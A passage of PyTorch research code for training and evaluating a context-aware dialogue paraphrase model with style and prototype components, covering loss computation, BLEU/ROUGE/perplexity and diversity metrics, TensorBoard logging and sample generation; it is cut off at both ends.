par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True) current_tf_ratio = self._get_tf_ratio(iteration) use_tf = (random() < current_tf_ratio) par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) par_1_res, par_2_res, context_1_style, context_2_style, par_1_style, par_2_style, par_semantics, _, _, proto_dists = self.model(_input = (par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing = True, teacher_forcing_ratio = current_tf_ratio, switch_rate = self.switch_rate, semantic_full_dropout = self.semantic_full_dropout, additional_supervision = False, use_semantic_specific_attn = self.use_semantic_specific_attn, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0)) loss_1, loss_slots_1, loss_VAE_1, acc_1, acc_slots_1 = self._calculate_loss(par_1_res, par_1_words, par_1_masks, context_1_style, par_1_style) loss_2, loss_slots_2, loss_VAE_2, acc_2, acc_slots_2 = self._calculate_loss(par_2_res, par_2_words, par_2_masks, context_2_style, par_2_style) loss_style, acc_style = self.loss_module_style(context_1_style, context_2_style, par_1_style, par_2_style, proto_dists) loss = (loss_1 + loss_2) / 2.0 loss_slots = (loss_slots_1 + loss_slots_2) / 2.0 loss_VAE = (loss_VAE_1 + loss_VAE_2) / 2.0 loss_cosine_to_others = (F.cosine_similarity(par_semantics[0].unsqueeze(dim=0), par_semantics[1].unsqueeze(dim=1), dim=-1)) * (1 - torch.eye(par_semantics[0].size(0), device=par_semantics[0].device)) loss_cosine_to_others = loss_cosine_to_others.sum() / (1.0 * par_semantics[0].size(0) * (par_semantics[0].size(0)-1)) loss_cos = (1 - F.cosine_similarity(par_semantics[0], par_semantics[1], dim=-1)).mean() euclidean_dist_to_others = euclidean_distance(par_semantics[0].unsqueeze(dim=0), par_semantics[1].unsqueeze(dim=1)) * (1 - torch.eye(par_semantics[0].size(0), device=par_semantics[0].device)) euclidean_dist_to_others = euclidean_dist_to_others.sum() / (1.0 * par_semantics[0].size(0) * (par_semantics[0].size(0)-1)) euclidean_dist = euclidean_distance(par_semantics[0], par_semantics[1]).mean() acc = (acc_1 + acc_2) / 2.0 acc_slots = (acc_slots_1 + acc_slots_2) / 2.0 final_loss = loss + \ loss_slots + \ loss_VAE * self.KL_scheduler.get(iteration) + \ loss_cos * self.cosine_loss_scaling + \ ((loss_cosine_to_others * self.cosine_loss_scaling / 2.0) if self.cosine_counter_loss else 0.0) + \ loss_style * self.style_loss_scheduler.get(iteration) if self.pure_style_loss: final_loss = loss_style self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_slots"].append(loss_slots.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["loss_style"].append(loss_style.item()) self.summary_dict["KL_scheduler"] = [self.KL_scheduler.get(iteration)] self.summary_dict["style_loss_scheduler"] = [self.style_loss_scheduler.get(iteration)] self.summary_dict["loss_cosine"].append(loss_cos.item()) self.summary_dict["loss_cosine_to_others"].append(loss_cosine_to_others.item()) self.summary_dict["euclidean_dist"].append(euclidean_dist.item()) self.summary_dict["euclidean_dist_to_others"].append(euclidean_dist_to_others.item()) self.summary_dict["acc_slots"].append(acc_slots.item()) self.summary_dict["acc_style"].append(acc_style.item()) self.summary_dict["loss_combined"].append(final_loss.item()) hist_summary_values = { "slots_word_dist": ([par_1_res[1][:,:,0], par_2_res[1][:,:,0]], None, 10), "context_style_mu": ([context_1_style[1], context_2_style[1]], 10, 10), "context_style_sigma": ([context_1_style[2], context_2_style[2]], 2, 10), "par_style_mu": ([par_1_style[1], par_2_style[1]], 10, 10), "par_style_sigma": ([par_1_style[2], par_2_style[2]], 2, 10) } if self.model.encoder_module.use_prototype_styles: for proto_index in range(proto_dists[0].size(1)): hist_summary_values["proto_%i_attn" % proto_index] = ([proto_dists[0][:,proto_index], proto_dists[1][:,proto_index]], None, 50) if not self.model.encoder_module.no_prototypes_for_context: hist_summary_values["proto_%i_context_attn" % proto_index] = ([proto_dists[2][:,proto_index], proto_dists[3][:,proto_index]], None, 50) for dict_key, dict_vals in hist_summary_values.items(): hist_tensors, max_val, max_list_len = dict_vals new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors if t is not None] new_vals = [e for sublist in new_vals for e in sublist] if max_val is not None: new_vals = [max(min(e,max_val),-max_val) for e in new_vals] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > max_list_len: del self.summary_dict[dict_key][0] return final_loss, acc def _calculate_loss(self, par_res, batch_labels, par_masks, context_style, par_style=None): par_word_dist, slot_dist, _, _ = par_res # Remove unknown word labels from the loss if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] par_masks = par_masks[:,1:].contiguous() # First token is SOS else: print("[#] WARNING: Batch labels were not shortend. First token ids: \n%s \nSOS index: %i" % (str(batch_labels[:,0]), get_SOS_index())) unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels < 0)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label if par_word_dist.size(0) > batch_labels.size(0) and (par_word_dist.size(0) % batch_labels.size(0) == 0): extend_factor = int(par_word_dist.size(0) / batch_labels.size(0)) batch_labels = batch_labels.repeat(extend_factor, 1) # print("[I] INFO: Extending batch labels by factor %i" % (extend_factor)) if slot_dist.size(0) > par_masks.size(0) and (slot_dist.size(0) % par_masks.size(0) == 0): extend_factor = int(slot_dist.size(0) / par_masks.size(0)) par_masks = par_masks.repeat(extend_factor, 1) # print("[I] INFO: Extending paraphrase masks by factor %i" % (extend_factor)) ## Loss reconstruction loss = self.loss_module(par_word_dist.view(-1, par_word_dist.shape[-1]), batch_labels.view(-1)) slot_dist = torch.log(slot_dist + (slot_dist == 0).float()) loss_slots = self.loss_module_slots(slot_dist.view(-1, slot_dist.shape[-1]), par_masks.view(-1)) loss_slots[torch.isnan(loss_slots)] = 0 loss_slots = loss_slots * (par_masks.view(-1) >= 0).float() loss_slots = loss_slots.sum() / (par_masks >= 0).float().sum() ## Accuracy calculation _, pred_labels = torch.max(par_word_dist, dim=-1) acc = torch.sum(pred_labels == batch_labels).float() / torch.sum(batch_labels != -1).float() _, pred_slots = torch.max(slot_dist, dim=-1) acc_slots = torch.sum((pred_slots == par_masks) & (pred_slots > 0)).float() / (torch.sum(par_masks > 0).float() + 1e-10) ## Loss VAE regularization _, style_mu, style_std = context_style loss_VAE = ContextAwareDialogueTask._calc_loss_VAE(style_mu, style_std) if par_style is not None: _, par_style_mu, par_style_std = par_style if par_style_mu is not None and par_style_std is not None: loss_VAE = loss_VAE / 2.0 + ContextAwareDialogueTask._calc_loss_VAE(par_style_mu, par_style_std) / 2.0 return loss, loss_slots, loss_VAE, acc, acc_slots @staticmethod def _calc_loss_VAE(mu, std): if mu is None or std is None: return torch.tensor([0.0], dtype=torch.float32).to(get_device()) return torch.mean(- torch.log(std) + (std ** 2 - 1 + mu ** 2) / 2) def _eval_batch(self, batch, use_context_style=False, perform_beamsearch=False): par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) p1_res, p2_res, context_1_style, context_2_style, par_1_style, par_2_style, _, _, _, proto_dists = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=True, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, use_semantic_specific_attn = self.use_semantic_specific_attn, use_context_style=use_context_style, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0)) p1_perplexity_probs, _, _, _ = p1_res p2_perplexity_probs, _, _, _ = p2_res p1_perplexity_probs = p1_perplexity_probs.detach() p2_perplexity_probs = p2_perplexity_probs.detach() del p1_res del p2_res _, acc_style = self.loss_module_style(context_1_style, context_2_style, par_1_style, par_2_style, proto_dists) acc_style = acc_style.detach() p1_res_tf, p2_res_tf, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, max_generation_steps=50, use_semantic_specific_attn = self.use_semantic_specific_attn, use_context_style=use_context_style, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0)) _, _, p1_generated_words, p1_generated_lengths = p1_res_tf _, _, p2_generated_words, p2_generated_lengths = p2_res_tf p1_generated_words = p1_generated_words.detach() p1_generated_lengths = p1_generated_lengths.detach() p2_generated_words = p2_generated_words.detach() p2_generated_lengths = p2_generated_lengths.detach() del p1_res_tf del p2_res_tf if perform_beamsearch: start_time = time.time() p1_res_beam, _, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, beams=8, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, max_generation_steps=40, use_semantic_specific_attn = self.use_semantic_specific_attn, use_context_style=use_context_style, ignore_context = self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0), only_par_1=True) _, _, p1_generated_words_beam, p1_generated_lengths_beam = p1_res_beam p1_generated_words_beam = p1_generated_words_beam.detach() p1_generated_lengths_beam = p1_generated_lengths_beam.detach() del p1_res_beam print("Completed beam search in %ss" % str(time.time() - start_time)) else: p1_generated_words_beam, p1_generated_lengths_beam = None, None subbatches = 4 subbatch_size = int(par_1_words.size(0) / subbatches) all_generated_words_styles, all_generated_lengths_styles = {"sample_all": [], "sample_gt": [], "sample_context": []}, {"sample_all": [], "sample_gt": [], "sample_context": []} for subbatch_index in range(subbatches): bstart, bend = int(subbatch_index*subbatch_size), int((subbatch_index+1)*subbatch_size) for samp_cont, samp_gt, name in zip([True, True, False], [True, False, True], ["sample_all", "sample_context", "sample_gt"]): _, _, p1_generated_words_styles, p1_generated_lengths_styles = self.model.sample_reconstruction_styles((par_1_words[bstart:bend], par_1_lengths[bstart:bend], par_1_masks[bstart:bend], par_1_slots[bstart:bend], par_1_slot_lengths[bstart:bend], contexts_1_words[bstart:bend], contexts_1_lengths[bstart:bend]), num_samples=8, max_generation_steps=50, sample_gt=samp_gt, sample_context=samp_cont) p1_generated_words_styles = p1_generated_words_styles.detach() p1_generated_lengths_styles = p1_generated_lengths_styles.detach() all_generated_words_styles[name].append(p1_generated_words_styles) all_generated_lengths_styles[name].append(p1_generated_lengths_styles) p1_generated_lengths_styles = {k: torch.cat(val, dim=0) for k, val in all_generated_lengths_styles.items()} max_gen_len = {k: max([t.size(2) for t in val]) for k, val in all_generated_words_styles.items()} all_generated_words_styles = {k: [t if t.size(2) >= max_gen_len[k] else torch.cat([t, t.new_zeros(t.size(0), t.size(1), max_gen_len[k]-t.size(2))], dim=2) for t in val] for k, val in all_generated_words_styles.items()} p1_generated_words_styles = {k: torch.cat(val, dim=0) for k, val in all_generated_words_styles.items()} # Remove unknown word labels from the evaluation batch_labels = par_1_words if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] unknown_label = ((batch_labels == get_UNK_index()) | (batch_labels == -1)).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label return batch_labels, p1_perplexity_probs, p1_generated_words, p1_generated_lengths, p1_generated_words_styles, p1_generated_lengths_styles, p1_generated_words_beam, p1_generated_lengths_beam, acc_style def eval(self, dataset=None, batch_size=64, label_lengths=False, noun_mask=False): # Default: if no dataset is specified, we use validation dataset self.eval_counter += 1 if dataset is None: assert self.val_dataset is not None, "[!] ERROR: Validation dataset not loaded. Please load the dataset beforehand for evaluation." dataset = self.val_dataset self.model.eval() if not self.debug: batch_size = 128 # Prepare metrics number_batches = int(math.ceil(dataset.get_num_examples() * 1.0 / batch_size)) if self.debug: number_batches = min(8, number_batches) perplexity, perplexity_context = [], [] acc_style = 0 hypotheses, references = None, None hypotheses_context, references_context = None, None hypotheses_styles, hypotheses_styles_gt, hypotheses_styles_context, hypotheses_beams = None, None, None, None # Evaluation loop for batch_ind in range(number_batches): if debug_level() == 0: print("Evaluation process: %4.2f%% (batch %i of %i)" % (100.0 * batch_ind / number_batches, batch_ind+1, number_batches), end="\r") # Evaluate single batch with torch.no_grad(): batch = dataset.get_batch(batch_size, loop_dataset=False, toTorch=True, label_lengths=label_lengths, noun_mask=noun_mask, mask_prob=0.0) batch_labels, perplexity_logits, generated_words, generated_lengths, generated_words_styles, generated_lengths_styles, generated_words_beams, generated_lengths_beams, loc_acc_style = self._eval_batch(batch, perform_beamsearch=False and (batch_ind < 4) and ((self.eval_counter % 5) == 1)) if True or not (self.model.encoder_module.use_prototype_styles and (self.style_loss_scaling == 0)): _, perplexity_logits_context, generated_words_context, generated_lengths_context, _, _, _, _, _ = self._eval_batch(batch, use_context_style=True, perform_beamsearch=False) else: perplexity_logits_context = perplexity_logits generated_words_context = generated_words generated_lengths_context = generated_lengths # Perplexity calculation perplexity += TaskTemplate._eval_preplexity(perplexity_logits, batch_labels).cpu().numpy().tolist() perplexity_context += TaskTemplate._eval_preplexity(perplexity_logits_context, batch_labels).cpu().numpy().tolist() acc_style += loc_acc_style.item() hypotheses, references = add_if_not_none(TaskTemplate._preds_to_sents(batch_labels, generated_words, generated_lengths), (hypotheses, references)) hypotheses_context, references_context = add_if_not_none(TaskTemplate._preds_to_sents(batch_labels, generated_words_context, generated_lengths_context), (hypotheses_context, references_context)) hypotheses_styles = add_if_not_none(TaskTemplate._reconst_sents(generated_words_styles["sample_all"], generated_lengths_styles["sample_all"]), hypotheses_styles) hypotheses_styles_gt = add_if_not_none(TaskTemplate._reconst_sents(generated_words_styles["sample_gt"], generated_lengths_styles["sample_gt"]), hypotheses_styles_gt) hypotheses_styles_context = add_if_not_none(TaskTemplate._reconst_sents(generated_words_styles["sample_context"], generated_lengths_styles["sample_context"]), hypotheses_styles_context) if generated_words_beams is not None: hypotheses_beams = add_if_not_none(TaskTemplate._reconst_sents(generated_words_beams, generated_lengths_beams), hypotheses_beams) BLEU_score, prec_per_ngram = get_BLEU_score(hypotheses, references) BLEU_score_context, prec_per_ngram_context = get_BLEU_score(hypotheses_context, references_context) ROUGE_score = get_ROUGE_score(hypotheses, references) ROUGE_score_context = get_ROUGE_score(hypotheses_context, references_context) # Metric output avg_perplexity = sum(perplexity) / len(perplexity) avg_perplexity_context = sum(perplexity_context) / len(perplexity_context) median_perplexity = median(perplexity) unigram_variety, unigram_entropy = get_diversity_measure(hypotheses, n_gram=1) bigram_variety, bigram_entropy = get_diversity_measure(hypotheses, n_gram=2) unigram_variety_context, unigram_entropy_context = get_diversity_measure(hypotheses_context, n_gram=1) bigram_variety_context, bigram_entropy_context = get_diversity_measure(hypotheses_context, n_gram=2) unigram_variety_gt, unigram_entropy_gt = get_diversity_measure(references, n_gram=1) bigram_variety_gt, bigram_entropy_gt = get_diversity_measure(references, n_gram=2) unigram_variety_style, unigram_entropy_style = get_diversity_measure(hypotheses_styles, n_gram=1) bigram_variety_style, bigram_entropy_style = get_diversity_measure(hypotheses_styles, n_gram=2) unigram_variety_style_gt, unigram_entropy_style_gt = get_diversity_measure(hypotheses_styles_gt, n_gram=1) bigram_variety_style_gt, bigram_entropy_style_gt = get_diversity_measure(hypotheses_styles_gt, n_gram=2) unigram_variety_style_context, unigram_entropy_style_context = get_diversity_measure(hypotheses_styles_context, n_gram=1) bigram_variety_style_context, bigram_entropy_style_context = get_diversity_measure(hypotheses_styles_context, n_gram=2) if hypotheses_beams is None: unigram_variety_beams, unigram_entropy_beams, bigram_variety_beams, bigram_entropy_beams = 0.0, 0.0, 0.0, 0.0 else: unigram_variety_beams, unigram_entropy_beams = get_diversity_measure(hypotheses_beams, n_gram=1) bigram_variety_beams, bigram_entropy_beams = get_diversity_measure(hypotheses_beams, n_gram=2) acc_style = acc_style / number_batches if self.semantic_full_dropout_eval == 1.0 and self.model.style_full_dropout == 1.0: # assert avg_perplexity == avg_perplexity_context, "[!] ERROR: Context perplexity is different from normal: %f vs %f" % (avg_perplexity, avg_perplexity_context) assert BLEU_score == BLEU_score_context, "[!] ERROR: BLEU scores with/without context is different although full dropout is applied: %f vs %f" % (BLEU_score, BLEU_score_context) assert all([r == r_c for r, r_c in zip(references, references_context)]), "[!] ERROR: References do not match" for p, p_c in zip(hypotheses, hypotheses_context): if p != p_c: print("-"*50+"\nPredictions do not fit.\nPrediction 1: %s\nPrediction 2: %s\n" % (str(p), str(p_c))+"-"*50) assert all([p == p_c for p, p_c in zip(hypotheses, hypotheses_context)]), "[!] ERROR: Hypotheses/predictions do not match" assert bigram_entropy_context == bigram_entropy, "[!] ERROR: Entropy for bigram differ" detailed_metrics = { "perplexity": avg_perplexity, "perplexity_context": avg_perplexity_context, "perplexity_median": median_perplexity, "diversity_unigram_entropy": unigram_entropy, "diversity_bigram_entropy": bigram_entropy, "diversity_unigram": unigram_variety, "diversity_bigram": bigram_variety, "diversity_unigram_entropy_context": unigram_entropy_context, "diversity_bigram_entropy_context": bigram_entropy_context, "diversity_unigram_context": unigram_variety_context, "diversity_bigram_context": bigram_variety_context, "diversity_unigram_entropy_gt": unigram_entropy_gt, "diversity_bigram_entropy_gt": bigram_entropy_gt, "diversity_unigram_gt": unigram_variety_gt, "diversity_bigram_gt": bigram_variety_gt, "diversity_unigram_style": unigram_variety_style, "diversity_bigram_style": bigram_variety_style, "diversity_unigram_entropy_style": unigram_entropy_style, "diversity_bigram_entropy_style": bigram_entropy_style, "diversity_unigram_style_gt": unigram_variety_style_gt, "diversity_bigram_style_gt": bigram_variety_style_gt, "diversity_unigram_entropy_style_gt": unigram_entropy_style_gt, "diversity_bigram_entropy_style_gt": bigram_entropy_style_gt, "diversity_unigram_style_context": unigram_variety_style_context, "diversity_bigram_style_context": bigram_variety_style_context, "diversity_unigram_entropy_style_context": unigram_entropy_style_context, "diversity_bigram_entropy_style_context": bigram_entropy_style_context, "diversity_unigram_beams": unigram_variety_beams, "diversity_bigram_beams": bigram_variety_beams, "diversity_unigram_entropy_beams": unigram_entropy_beams, "diversity_bigram_entropy_beams": bigram_entropy_beams, "BLEU": BLEU_score, "BLEU_context": BLEU_score_context, "acc_style": acc_style } for n in range(len(prec_per_ngram)): detailed_metrics["BLEU_%i-gram" % (n+1)] = float(prec_per_ngram[n]) for metric, results in ROUGE_score.items(): if metric[-1] in ["1", "2", "3", "4"]: continue for sub_category, val in results.items(): detailed_metrics[metric + "_" + sub_category] = val self.model.train() dataset.reset_index() return BLEU_score_context, detailed_metrics def add_summary(self, writer, iteration): # TODO: Add some example generations here. Either run the model again for some random sentences, or save last training sentences writer.add_scalar("train_%s/teacher_forcing_ratio" % (self.name), self._get_tf_ratio(iteration), iteration) for key, val in self.summary_dict.items(): if not isinstance(val, list): writer.add_scalar("train_%s/%s" % (self.name, key), val, iteration) self.summary_dict[key] = 0.0 elif len(val) == 0: continue elif not isinstance(val[0], list): writer.add_scalar("train_%s/%s" % (self.name, key), mean(val), iteration) self.summary_dict[key] = list() else: if self.debug or iteration % 5000 == 0: # Histograms can take time to be exported val = [v for sublist in val for v in sublist] if len(val) == 0: continue writer.add_histogram("train_%s/%s" % (self.name, key), np.array(val), iteration) self.summary_dict[key] = list() if self.debug or iteration % 5000 == 0: gen_list = self.generate_examples() for i in range(min(4, len(gen_list))): if not self.generated_before: writer.add_text(self.name + "_gen%i_input_phrase" % (i), gen_list[i][0], iteration) writer.add_text(self.name + "_gen%i_input_labels" % (i), gen_list[i][1], iteration) writer.add_text(self.name + "_gen%i_input_contexts" % (i), gen_list[i][2], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase" % (i), gen_list[i][3], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase_context" % (i), gen_list[i][4], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase_tf" % (i), gen_list[i][5], iteration) gen_list = self.generate_random_style_samples() for i in range(min(4, len(gen_list))): if not self.generated_before: writer.add_text(self.name + "_samp%i_input_phrase" % (i), gen_list[i][0], iteration) for j in range(len(gen_list[i][1])): writer.add_text(self.name + "_samp%i_sample_%i" % (i, j), gen_list[i][1][j], iteration) self.generate_slot_dist_images(writer, iteration) self.generated_before = True def generate_examples(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) # 2.) Push data through network par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): par_1_res, par_2_res, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, use_semantic_specific_attn=self.use_semantic_specific_attn) par_1_res_context, par_2_res_context, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=False, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, use_semantic_specific_attn=self.use_semantic_specific_attn, use_context_style=True) par_1_res_tf, par_2_res_tf, _, _, _, _, _, _, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths), teacher_forcing=True, switch_rate=eval_swr, semantic_full_dropout=self.semantic_full_dropout_eval, use_semantic_specific_attn=self.use_semantic_specific_attn) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() generated_paraphrases_context = list() generated_paraphrases_tf = list() input_phrases = list() input_labels = list() input_contexts = list() gen_par_1_UNKdist = par_1_res[1].cpu().numpy() gen_par_1_words = par_1_res[2].cpu().numpy() gen_par_1_lengths = par_1_res[3].cpu().numpy() gen_par_2_UNKdist = par_2_res[1].cpu().numpy() gen_par_2_words = par_2_res[2].cpu().numpy() gen_par_2_lengths = par_2_res[3].cpu().numpy() gen_par_1_context_UNKdist = par_1_res_context[1].cpu().numpy() gen_par_1_context_words = par_1_res_context[2].cpu().numpy() gen_par_1_context_lengths = par_1_res_context[3].cpu().numpy() gen_par_2_context_UNKdist = par_2_res_context[1].cpu().numpy() gen_par_2_context_words = par_2_res_context[2].cpu().numpy() gen_par_2_context_lengths = par_2_res_context[3].cpu().numpy() gen_par_1_words_tf = par_1_res_tf[2].cpu().numpy() gen_par_1_lengths_tf = par_1_res_tf[3].cpu().numpy() gen_par_2_words_tf = par_2_res_tf[2].cpu().numpy() gen_par_2_lengths_tf = par_2_res_tf[3].cpu().numpy() par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, contexts_1_words, contexts_1_lengths, contexts_2_words, contexts_2_lengths = self.gen_batch for embeds, lengths, list_to_add, slot_vals, slot_lengths, slot_preds in zip([contexts_1_words, contexts_2_words, par_1_words if eval_swr == 0 else par_2_words, par_2_words if eval_swr == 0 else par_1_words, par_1_words, par_2_words, gen_par_1_words, gen_par_2_words, gen_par_1_context_words, gen_par_2_context_words, gen_par_1_words_tf, gen_par_2_words_tf], [contexts_1_lengths, contexts_2_lengths, par_1_lengths if eval_swr == 0 else par_2_lengths, par_2_lengths if eval_swr == 0 else par_1_lengths, par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths, gen_par_1_context_lengths, gen_par_2_context_lengths, gen_par_1_lengths_tf, gen_par_2_lengths_tf], [input_contexts, input_contexts, input_phrases, input_phrases, input_labels, input_labels, generated_paraphrases, generated_paraphrases, generated_paraphrases_context, generated_paraphrases_context, generated_paraphrases_tf, generated_paraphrases_tf], [None, None, par_1_slots if eval_swr == 0 else par_2_slots, par_2_slots if eval_swr == 0 else par_1_slots, par_1_slots, par_2_slots, par_1_slots, par_2_slots, par_1_slots, par_2_slots, None, None], [None, None, par_1_slot_lengths if eval_swr == 0 else par_2_slot_lengths, par_2_slot_lengths if eval_swr == 0 else par_1_slot_lengths, par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths, par_1_slot_lengths, par_2_slot_lengths, None, None], [None, None, None, None, None, None, gen_par_1_UNKdist[:,:,1:], gen_par_2_UNKdist[:,:,1:], gen_par_1_context_UNKdist[:,:,1:], gen_par_2_context_UNKdist[:,:,1:], None, None]): reconstruct_sentences(embeds, lengths, slot_vals=slot_vals, slot_lengths=slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, input_labels, input_contexts, generated_paraphrases, generated_paraphrases_context, generated_paraphrases_tf)) self.model.train() return gen_list def generate_random_style_samples(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) par_words, par_lengths, _, _, par_slots, par_slot_lengths, _, _, context_words, context_lengths, _, _ = batch_torch par_masks = self.model.embedding_module.generate_mask(par_words) with torch.no_grad(): _, gen_par_UNK_weigths, gen_par_words, gen_par_lengths = self.model.sample_reconstruction_styles((par_words, par_lengths, par_masks, par_slots, par_slot_lengths, context_words, context_lengths), num_samples=8) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() gen_par_UNK_weigths = gen_par_UNK_weigths.cpu().numpy() gen_par_words = gen_par_words.cpu().numpy() gen_par_lengths = gen_par_lengths.cpu().numpy() par_words = self.gen_batch[0] par_lengths = self.gen_batch[1] par_slots = self.gen_batch[4] par_slot_lengths = self.gen_batch[5] for embeds, lengths, list_to_add, add_sents_up, slot_preds in zip([par_words, gen_par_words], [par_lengths, gen_par_lengths], [input_phrases, generated_paraphrases], [True, False], [None, gen_par_UNK_weigths[:,:,1:]]): reconstruct_sentences(embeds, lengths, slot_vals=par_slots, slot_lengths=par_slot_lengths, slot_preds=slot_preds, list_to_add=list_to_add, add_sents_up=add_sents_up) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list def generate_style_dist(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) par_1_words, par_1_lengths, par_2_words, par_2_lengths, par_1_slots, par_1_slot_lengths, par_2_slots, par_2_slot_lengths, _, _, _, _ = batch_torch par_1_masks = self.model.embedding_module.generate_mask(par_1_words) par_2_masks = self.model.embedding_module.generate_mask(par_2_words) with torch.no_grad(): _, gen_par_1_UNK_weigths, gen_par_1_words, gen_par_1_lengths, gen_proto_dists, par_1_proto_dist = self.model.generate_style_dist((par_1_words, par_1_lengths, par_1_masks, par_1_slots, par_1_slot_lengths), max_generation_steps=40) _, gen_par_2_UNK_weigths, gen_par_2_words, gen_par_2_lengths, _, par_2_proto_dist = self.model.generate_style_dist((par_2_words, par_2_lengths, par_2_masks, par_2_slots, par_2_slot_lengths), max_generation_steps=40) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() phrase_proto_dist = list() proto_dist_descriptions = list() gen_par_1_UNK_weigths = gen_par_1_UNK_weigths.cpu().numpy() gen_par_1_words = gen_par_1_words.cpu().numpy() gen_par_1_lengths = gen_par_1_lengths.cpu().numpy() gen_par_2_UNK_weigths = gen_par_2_UNK_weigths.cpu().numpy() gen_par_2_words = gen_par_2_words.cpu().numpy() gen_par_2_lengths = gen_par_2_lengths.cpu().numpy() gen_proto_dists = gen_proto_dists.cpu().numpy() par_1_proto_dist = par_1_proto_dist.cpu().numpy() par_2_proto_dist = par_2_proto_dist.cpu().numpy() par_proto_dist = np.concatenate([par_1_proto_dist, par_2_proto_dist], axis=0) par_1_words = self.gen_batch[0] par_1_lengths = self.gen_batch[1] par_2_words = self.gen_batch[2] par_2_lengths = self.gen_batch[3] par_1_slots = self.gen_batch[4] par_1_slot_lengths = self.gen_batch[5] par_2_slots = self.gen_batch[6] par_2_slot_lengths = self.gen_batch[7] for embeds, lengths, par_slots, par_slot_lengths, list_to_add, add_sents_up, slot_preds in zip([par_1_words, par_2_words, gen_par_1_words, gen_par_2_words], [par_1_lengths, par_2_lengths, gen_par_1_lengths, gen_par_2_lengths], [par_1_slots, par_2_slots, par_1_slots, par_2_slots], 